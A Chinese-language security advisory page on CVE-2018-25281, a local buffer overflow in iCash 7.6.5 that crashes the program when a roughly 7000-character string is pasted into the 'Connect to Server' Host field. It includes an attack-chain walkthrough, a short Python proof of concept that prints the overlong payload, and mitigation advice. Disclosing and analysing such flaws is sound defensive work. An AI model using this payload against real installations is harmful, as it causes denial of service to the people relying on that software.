CVE-2018-25281 CVSS 5.5 中危

CVE-2018-25281 iCash缓冲区溢出漏洞

披露日期: 2026-04-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2018-25281

漏洞类型

缓冲区溢出

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

iCash

漏洞概述

iCash 7.6.5版本中存在缓冲区溢出漏洞。攻击者可利用“Connect to Server”对话框中的Host字段输入缺陷，通过粘贴超长字符串触发应用程序崩溃。该漏洞虽需本地访问和用户交互，但无需权限即可实施，主要导致服务拒绝，影响系统可用性。

技术细节

该漏洞的根源在于iCash应用程序对“Connect to Server”功能中Host字段的输入验证不足。软件未对用户输入的字符串长度进行严格的边界检查，导致固定大小的缓冲区无法处理过大的数据。攻击者可构造一个约7000字节的特定载荷，通过诱导目标用户将其粘贴至Host字段并点击连接，触发缓冲区溢出。根据CVSS 3.1评分向量，此攻击属于本地攻击向量（AV:L），需要用户交互（UI:R），且无需前置权限（PR:N）。溢出发生后，会直接破坏内存结构，导致应用程序异常终止，从而造成拒绝服务，但未观察到数据泄露或篡改行为。

攻击链分析

STEP 1

步骤1

攻击者获取目标机器的本地访问权限。

STEP 2

步骤2

攻击者生成包含7000个字符的恶意载荷字符串。

STEP 3

步骤3

诱导用户打开iCash软件并进入“Connect to Server”对话框。

STEP 4

步骤4

将恶意载荷粘贴到Host输入框中。

STEP 5

步骤5

诱导用户点击Connect按钮，触发缓冲区溢出导致程序崩溃。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import sys

# Generate a payload of 7000 bytes to trigger the buffer overflow
payload = "A" * 7000

try:
    print(f"Generated PoC payload length: {len(payload)}")
    print("Payload content: " + payload)
    print("\nInstructions:")
    print("1. Open iCash 7.6.5.")
    print("2. Navigate to 'Connect to Server' dialog.")
    print("3. Copy the payload above.")
    print("4. Paste into the 'Host' field.")
    print("5. Click 'Connect' to trigger the crash.")
except Exception as e:
    print(f"Error: {e}")

影响范围

iCash 7.6.5

防御指南

临时缓解措施

由于该漏洞需要用户交互，建议用户谨慎处理剪贴板内容，不要将来源不明的超长文本粘贴到软件的输入框中。同时，在官方发布补丁前，应限制对应用程序的本地物理访问或逻辑访问权限。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表